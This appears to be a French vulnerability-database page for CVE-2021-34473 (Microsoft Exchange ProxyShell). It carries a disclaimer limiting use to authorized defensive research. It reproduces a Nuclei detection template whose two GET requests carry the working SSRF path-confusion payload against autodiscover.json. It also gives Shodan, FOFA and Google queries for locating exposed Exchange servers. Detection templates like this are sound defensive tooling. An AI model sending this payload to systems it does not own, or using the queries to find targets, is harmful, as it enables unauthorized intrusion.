Exploit matérialisé
CVE-2021-34473
CRITICAL KEV1 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.
À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei
critical Vérifié
Source
Exchange Server - Remote Code Execution
Par projectdiscovery
Comment tester cet exploit
Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.
nuclei -id CVE-2021-34473 -u https://your-target
Template yaml
id: CVE-2021-34473
info:
name: Exchange Server - Remote Code Execution
author: arcc,intx0x80,dwisiswant0,r3dg33k
severity: critical
description: |
Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Exchange Server, potentially leading to a complete compromise of the system.
remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version.
reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
- https://nvd.nist.gov/vuln/detail/CVE-2021-34473
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2021-34473
cwe-id: CWE-918
epss-score: 0.99999
epss-percentile: 0.99997
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
metadata:
max-request: 2
vendor: microsoft
product: exchange_server
shodan-query:
- vuln:cve-2021-26855
- http.favicon.hash:1768726119
- http.title:"outlook"
- cpe:"cpe:2.3:a:microsoft:exchange_server"
fofa-query:
- title="outlook"
- icon_hash=1768726119
google-query: intitle:"outlook"
tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft,vkev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
matchers:
- type: word
part: body
words:
- "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
- "Exchange MAPI/HTTP Connectivity Endpoint"
condition: or
# digest: 4a0a0047304502204d02c89207fa36717cd2826b0886b6757f6c7f74c6bbf32f1c891200a6b66663022100d7f8cdb9e4f9b0b112cda2cbaef97e143edebf2cf0a97fb3b267a543a440d65e:922c64590222798bb761d5b6d8e72950